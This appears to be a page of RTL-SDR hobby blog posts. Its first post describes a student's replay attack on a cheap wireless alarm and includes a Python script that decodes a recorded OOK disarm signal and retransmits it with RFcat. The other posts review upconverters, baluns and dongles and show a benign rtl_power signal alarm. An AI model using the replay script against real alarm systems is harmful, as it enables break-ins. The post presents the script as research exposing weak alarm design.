Category: RTL-SDR

Hacking Alarm Systems with an RTL-SDR and RFcat

Back in 2014 the author of boredhackerblog.blogspot.com did a final year project for his wireless security class on hacking home alarm systems. His presentation was titled “How we broke into your house”. In his research the author used both an RTL-SDR (for receiving) and a simple RFcat wireless transmitter (for transmitting), and performed a simple replay attack against a cheap $50 alarm system. His process for reverse engineering the alarm was essentially:

  1. Look up the device frequency and listen to it with an RTL-SDR and SDR#.
  2. Record the signal and visually study the waveform in Audacity.
  3. Look up system part info and determine the encoding type (e.g. ASK/OOK).
  4. Determine the bit string and baud rate.
  5. Program the RFcat to send the same disarm binary string.
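As an added worked example (not the original author's code) of steps 2 to 5, the script below decodes a constructed OOK envelope of the kind you would see after AM-demodulating the alarm's signal in SDR# and recording it in Audacity: it thresholds the envelope, takes the shortest run between level transitions as one symbol period to recover the baud rate, reads off the bit string, packs it into bytes and hands it to RFcat for retransmission. The 48 kHz sample rate, the 2400 baud rate, the 433.92 MHz frequency and the bit pattern are all assumptions chosen for the example, not values from the alarm in the post; the transmit function uses the rflib (RFcat) API and only runs when you call it with a dongle attached.

```python
"""Decode a recorded ASK/OOK burst into its bit string and baud rate, then pack
it for replay with RFcat.  Added example for this post, not the original
author's code.  The sample rate, baud, bit pattern and frequency below are
constructed for illustration and do not describe any real alarm product."""

from typing import List, Tuple

SAMPLE_RATE = 48_000  # Hz; a typical Audacity recording rate (assumption)


def make_ook_waveform(bits: str, baud: int, fs: int = SAMPLE_RATE,
                      idle: int = 100) -> List[float]:
    """Constructed test signal: the OOK envelope as it would look after AM
    demodulation.  Carrier on = 1.0, carrier off = a small fixed floor that
    stands in for receiver noise.  Idle (carrier off) padding surrounds it."""
    spb = fs // baud  # samples per bit
    env = [0.05] * idle
    for b in bits:
        env.extend([1.0 if b == "1" else 0.05] * spb)
    env.extend([0.05] * idle)
    return env


def decode_ook(samples: List[float], fs: int = SAMPLE_RATE) -> Tuple[str, int]:
    """Threshold the envelope at half its peak, measure the run length of each
    level, and treat the shortest run as one symbol period.  Longer runs are
    repeated symbols.  Returns (bit_string, baud)."""
    threshold = max(samples) / 2.0
    levels = [1 if s > threshold else 0 for s in samples]

    # Collapse consecutive identical samples into [level, run_length] pairs.
    runs: List[List[int]] = []
    for lv in levels:
        if runs and runs[-1][0] == lv:
            runs[-1][1] += 1
        else:
            runs.append([lv, 1])

    # Drop the idle carrier-off periods before and after the burst.
    while runs and runs[0][0] == 0:
        runs.pop(0)
    while runs and runs[-1][0] == 0:
        runs.pop()
    if not runs:
        raise ValueError("no burst found above threshold")

    symbol = min(length for _, length in runs)      # samples per symbol
    baud = round(fs / symbol)
    bits = "".join(str(lv) * round(length / symbol) for lv, length in runs)
    return bits, baud


def pack_bits(bits: str) -> bytes:
    """MSB-first packing, zero-padded to a byte boundary; RFxmit takes raw bytes."""
    bits = bits + "0" * (-len(bits) % 8)
    return bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits), 8))


def rfcat_replay(payload: bytes, freq_hz: int, baud: int, repeat: int = 5) -> None:
    """Retransmit the recovered frame with RFcat (rflib).  Imported lazily so the
    decoder above runs without the hardware or the rflib package installed.
    freq_hz and baud must come from the analysis steps; see the caller."""
    from rflib import RfCat, MOD_ASK_OOK  # needs an RFcat dongle plugged in

    d = RfCat()
    d.setFreq(freq_hz)
    d.setMdmModulation(MOD_ASK_OOK)
    d.setMdmDRate(baud)
    d.setMdmSyncMode(0)          # no sync word: send exactly the bits recorded
    d.makePktFLEN(len(payload))  # fixed-length packet of our payload size
    d.setMaxPower()
    d.RFxmit(payload, repeat=repeat)


if __name__ == "__main__":
    recorded = make_ook_waveform("1010110011101001", baud=2400)  # constructed
    bits, baud = decode_ook(recorded)
    print(f"bits={bits} baud={baud} payload={pack_bits(bits).hex()}")
    # With an RFcat attached (433.92 MHz is an example frequency only):
    # rfcat_replay(pack_bits(bits), 433_920_000, baud)
```

Because the disarm command is a static bit string, the replay needs no understanding of the frame beyond its bits and timing; a system that used rolling or authenticated codes would reject a retransmitted frame, which is exactly the protection this class of $50 alarm lacks.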

Once again research like this shows that cheap home alarm systems have essentially no protection against wireless attacks: the disarm command is a fixed bit string sent in the clear, so anyone who records it once can replay it at will. In a previous post we also showed how the popular SimpliSafe wireless alarm system could be disarmed in a somewhat similar way.

$50 home alarm system broken by an RTL-SDR and RFcat.

RTLSDR4Everyone: Review of the Nooelec Ham-It-Up V1.3 and Balun 1:9

Over on his blog rtlsdr4everyone, Akos has posted two new reviews. One post reviews the latest ham-it-up v1.3 upconverter and the other reviews the “Balun 1:9” impedance transformer.

An upconverter allows you to receive HF frequencies (0-30 MHz) with an RTL-SDR, which otherwise has a lower frequency limit of about 24 MHz. The ham-it-up upconverter was one of the first upconverters on the market that targeted users of the popular RTL-SDR dongle. Over the years the ham-it-up has slowly been revised and is now up to version 1.3. The biggest changes in the latest version are a revised design that uses the ADE-1 mixer in reverse (for better VLF operation), a presoldered oscillator, and the previously optional noise source now being included by default.

In his review Akos compares the ham-it-up v1.3 to the older v1.2 model. His results show that the revised design has better immunity to noise and better FM broadcast filtering. He also tests the new battery power connection and shows that running from battery power is less noisy.

Previously we posted a review comparing the ham-it-up v1.0, SpyVerter and Nobu’s Japanese upconverter. Although the ham-it-up v1.3 is much improved (we have not tested it ourselves), we still believe the SpyVerter is the better upconverter choice at the moment due to its better architectural design and included metal case, though Akos does point out that the ham-it-up is currently about $15 USD cheaper and has a passthrough switch.

Ham-it-up v1.3 vs ham-it-up v1.2

In his second post Akos reviews the Balun 1:9, a $10 balun designed for attaching a long wire antenna to the ham-it-up. The goal of the balun 1:9 is to transform the high impedance of the long wire antenna down to around 50/75 Ohms for the receiver. In Akos’ results he writes that he mostly sees identical or better performance with the balun connected.

The Nooelec balun 1:9

To add to Akos’ review, we want to note that there may be some confusion over baluns and ununs. We wonder if a 9:1 unun (instead of a balun) should be used for a long wire antenna, since a long wire is an unbalanced antenna, while a balun is meant for a balanced antenna such as a dipole. In his review Akos also found that connecting two longwire antennas to the spring terminals improved reception. This may have been because adding two longwires essentially created a balanced dipole antenna. To use the balun as an unun with a single longwire antenna, we think that the second terminal and the coax shield should be connected to a good ground such as a cold water pipe. If you have knowledge on this topic please comment to confirm or expand on our theory.

FlightBox: Commercial RTL-SDR Based ADS-B (1090ES & 978UAT) Receiver for Pilots

For some time now, small aircraft pilots who don’t have access to expensive $1000+ ADS-B gear have been successfully using an RTL-SDR and Raspberry Pi combination to receive ADS-B and UAT and display aircraft and weather data on an iPad. The first time we posted about this was back in August 2015.

The full implementation uses two RTL-SDR dongles: one receives 1090ES aircraft position information and the other receives 978 UAT weather information. Both dongles are connected to a Raspberry Pi mini computer that runs a program called Stratux. Stratux takes the ADS-B information received by the RTL-SDRs and re-transmits the data over WiFi. An iPad running pilot navigation software such as ForeFlight then connects to that WiFi network and receives the ADS-B and weather information.

Assembling a Stratux box requires purchasing each individual component, or a Raspberry Pi kit that includes the Stratux software image on an SD card, an RTL-SDR and a WiFi adapter. However, setting up a Stratux box may be a little difficult for pilots who do not have any electronics DIY skills.

To solve this, a new product called FlightBox recently ran a successful Kickstarter campaign. FlightBox provides a ruggedized plastic case, a Raspberry Pi 2 preloaded with software, two nano RTL-SDR dongles, two pigtail adapters, a 10 Hz WAAS GPS module, and two customized ADS-B whip antennas (one for 978 MHz and one for 1090 MHz).

The FlightBox costs $200 for single band operation and $250 for dual band (1090ES and 978UAT). They are currently accepting pre-orders for delivery in late March/April.

For more information about Stratux see the active discussion forum at reddit.com/r/stratux.

The FlightBox: An RTL-SDR based ADS-B 1090ES and 978UAT receiver for Pilots.
Components used in the FlightBox, including two nano RTL-SDR dongles.

Creating an RF Proximity Alarm (Close Call) with an RTL-SDR

“Close Call” is a feature that some radio scanners have which notifies the user when there is a radio transmitter in the near vicinity (such as a police radio). It works by detecting near field emissions, so it only triggers on a strong RF signal from a transmitter very close by.

Over on the ar15.com forums, user seek2 wanted something similar to the “Close Call” feature, but didn’t want certain transmissions, like APRS signals from hams driving by, to set it off. He also didn’t want to be restricted to near field emissions; rather he wanted something that acted more like a squelch that only opens for strong signals.

To implement this seek2 used an RTL-SDR dongle together with the rtl_power spectrum scanning software. He has rtl_power append its signal strength data to a CSV file, uses the Linux tail -f command to stream the newest lines of that file as it grows in real time, and pipes that output into a simple Python script that sets off an alarm and reports strong signals when it sees them. The script is also used to filter out reports from strong signals he does not care about, like APRS.
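An added example of the monitoring stage (this is not seek2’s script): it reads rtl_power CSV rows as they arrive on stdin, flags bins that stand well above the sweep’s noise floor, and ignores configured frequency ranges. It assumes rtl_power’s CSV layout (date, time, start Hz, end Hz, bin width Hz, sample count, then one dB value per bin), uses a threshold relative to the row’s median power rather than an absolute level because rtl_power’s dB scale is uncalibrated, and takes 144.390 MHz (the North American APRS channel) as the ignored range, which you would change for your region. The sample rows are constructed.

```python
"""Close-call style alarm fed by rtl_power.  Added example, not seek2's code.
Typical pipeline (rtl_power syntax: -f lower:upper:bin_size, -i integration seconds):
    rtl_power -f 144M:146M:100k -i 1 scan.csv &
    tail -f scan.csv | python3 closecall.py
Run without piped input, it processes the constructed SAMPLE_ROWS instead."""

import sys
from typing import Iterable, Iterator, List, Tuple

# Frequency ranges (Hz) that must not raise an alarm.  144.390 MHz is the
# North American APRS channel; this list is an assumption for the example.
IGNORE_RANGES = [(144_380_000, 144_400_000)]

# A bin this many dB above the sweep's median (its noise floor) is reported.
MARGIN_DB = 20.0


def parse_row(line: str) -> Tuple[int, int, float, List[float]]:
    """One rtl_power CSV row -> (hz_low, hz_high, hz_step, [dB per bin])."""
    f = [x.strip() for x in line.split(",")]
    if len(f) < 7:
        raise ValueError("not an rtl_power row")
    hz_low, hz_high, hz_step = int(f[2]), int(f[3]), float(f[4])
    return hz_low, hz_high, hz_step, [float(x) for x in f[6:]]


def ignored_bin(bin_lo: float, bin_hi: float) -> bool:
    """True if the bin's frequency span overlaps any ignored range."""
    return any(bin_lo < hi and bin_hi > lo for lo, hi in IGNORE_RANGES)


def noise_floor(dbs: List[float]) -> float:
    """Median power of the sweep; robust against a few strong bins."""
    s = sorted(dbs)
    return s[len(s) // 2]


def strong_bins(row: str, margin_db: float = MARGIN_DB) -> List[Tuple[float, float]]:
    """Return [(bin_start_hz, dB)] for bins above the floor and not ignored."""
    hz_low, _, step, dbs = parse_row(row)
    floor = noise_floor(dbs)
    hits = []
    for i, db in enumerate(dbs):
        bin_lo = hz_low + i * step
        if db - floor >= margin_db and not ignored_bin(bin_lo, bin_lo + step):
            hits.append((bin_lo, db))
    return hits


def monitor(lines: Iterable[str], margin_db: float = MARGIN_DB) -> Iterator[str]:
    """Consume rows as they arrive (e.g. from tail -f) and yield alarm strings.
    Blank or malformed lines (a partially written row) are skipped."""
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            hits = strong_bins(line, margin_db)
        except ValueError:
            continue
        for f, db in hits:
            yield f"ALARM {f / 1e6:.3f} MHz {db:.1f} dB"


# Constructed sample sweep: 144-146 MHz in 100 kHz bins, noise floor -30 dB.
_NOISE = ["-30.0"] * 20


def _row(time: str, overrides: dict) -> str:
    vals = list(_NOISE)
    for i, v in overrides.items():
        vals[i] = v
    return f"2016-02-01, {time}, 144000000, 146000000, 100000.00, 40, " + ", ".join(vals)


SAMPLE_ROWS = [
    _row("10:00:00", {3: "-5.0", 12: "-3.0"}),  # APRS burst (ignored) + strong mobile
    _row("10:00:01", {}),                        # quiet sweep, nothing to report
    _row("10:00:02", {0: "-8.0"}),               # strong signal in the first bin
]

if __name__ == "__main__":
    source = SAMPLE_ROWS if sys.stdin.isatty() else sys.stdin
    for alarm in monitor(source):
        print("\a" + alarm, flush=True)  # terminal bell plus the report
```

Using the median as the floor means a sweep full of strong broadcast signals will not trip the alarm on every bin, and widening IGNORE_RANGES is how you silence any other regular visitor such as a nearby repeater output.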

Below is a video showing an example of Close Call working on a Uniden hardware radio scanner for reference.

Uniden CloseCall© What is it? How does it work? How well does it perform?

Comparing LHCP and RHCP Reception of a Thuraya Satellite with an RTL-SDR and MIX4ALL

Over on YouTube Adam Alicajic 9A4QV (creator of the popular LNA4ALL) has uploaded a video comparing reception of Thuraya satellites with LHCP (left hand circular polarization) and RHCP (right hand circular polarization) patch antennas. To receive Thuraya satellites an LHCP antenna should be used, and Adam’s results show that using an antenna with the wrong polarization (RHCP) produces a signal almost 20 dB weaker, as theory predicts. Shortly after we initially posted this, Adam wrote in with the following comment:

The original Thuraya LHCP patch antenna has 2 patches stacked inside the panel antenna, and the hand-made RHCP patch antenna is made of only 1 patch. Theoretically, this should give 3 dB more gain for the Thuraya antenna.

The difference in the received signal due to polarization should be (theoretically) 20 dB, that’s RHCP vs. LHCP, and I experience some 18 dB of difference, which is a good result. Why not 20 dB? First of all it is impossible to get 3 dB more gain by stacking the antennas, this is just the theory; more likely 2 dB in practice.

To receive the signals Adam uses the patch antennas, which are connected to the MIX4ALL (a downconverter that he is currently developing), which is then connected to an RTL-SDR dongle.

In the first video Adam shows the difference the wrong polarization makes, and in the second he shows some information about the Thuraya LHCP antenna he uses.

Receiving Thuraya sat - LHCP and RHCP comparison using MIX4ALL

Thuraya antenna L-band + GSM

RTLSDR4Everyone: Avoiding RTL-SDR Rip-Offs

Akos from the rtlsdr4everyone blog has come up with a new post that aims to help people avoid getting ripped off when buying an RTL-SDR dongle. He shows that several sellers on eBay sell branded products (like Nooelec and our own RTL-SDR Blog brand) at higher prices and with higher shipping costs than the official manufacturer. He also notes that there are several sellers falsely advertising E4000 dongles, sellers offering custom units that are too expensive, and sellers that stuff popular keywords into their listings to climb the search rankings with an inflated price.

We’d like to add the following to Akos’ post: we believe the sellers offering our and other brands’ products at higher prices on marketplaces like eBay are simple market arbitrage bots that scrape items listed on Amazon and re-list them on eBay at a higher price. They claim to ship overseas, but they are simply using an address forwarder (like Shipito, Viabox or the eBay Global Shipping Program) to forward the goods from the USA. Note that we ship overseas from our Chinese warehouse for free, so there is no need to use an address forwarder and pay high shipping costs.

We’d also like to note that we now have three companies who legitimately resell our dongle-only units locally in the UK, Japan and India. They may charge higher prices as they must contend with import costs and business taxes, but the advantage is fast local shipping and local support.

Don't get ripped off by scammy sellers.

Getting SDR# and RTL-SDR to run on OSX El Capitan with Mono

A few weeks ago Matthew Miller showed us how it was possible to run DSD+ in OSX using a program called Wineskin. Now he’s uploaded a new video that shows how to get SDR# working in OSX El Capitan with Mono. SDR# is designed for Windows, but since it is written in C# on the .NET framework, it can run on OSX under the open source Mono .NET implementation. The installation is not as straightforward as simply downloading a zip file like on Windows, but the tutorial Matthew provides is clear and easy to follow.

The steps involve downloading SDR#, downloading Mono, installing MacPorts, installing PortAudio, installing the RTL-SDR libraries and then setting up some required symbolic links. Finally he shows that to access the RTL-SDR you must first run rtl_tcp and then connect to it using the RTL-SDR (TCP) option in SDR#.

SDR# on MAC OSX EL CAPITAN - RTL SDR - MONO

RTLSDR4Everyone: Review of 5 RTL-SDR Dongles

Over on the rtlsdr4everyone blog (previously known as the sdr4mariners blog), author Akos has uploaded a new post that compares 5 different RTL-SDR dongles against one another. He compares a Terratec R820T, a black Nooelec R820T, a blue Nooelec R820T2, our own RTL-SDR Blog R820T2 and a Nooelec Nano R820T.

In the post Akos gives an overview of the features of each dongle and runs tests on things like frequency drift and broadcast FM interference. He also runs SNR tests on airband, low UHF, high UHF and shortwave signals. His tests show that the dongles with the R820T2 chip outperform the dongles with the R820T chip by about 4-5 dB in SNR, and that the overall best dongle is our RTL-SDR Blog dongle.

In the future Akos hopes to also review the Nooelec 9:1 balun.

The dongles compared in Akos’ Review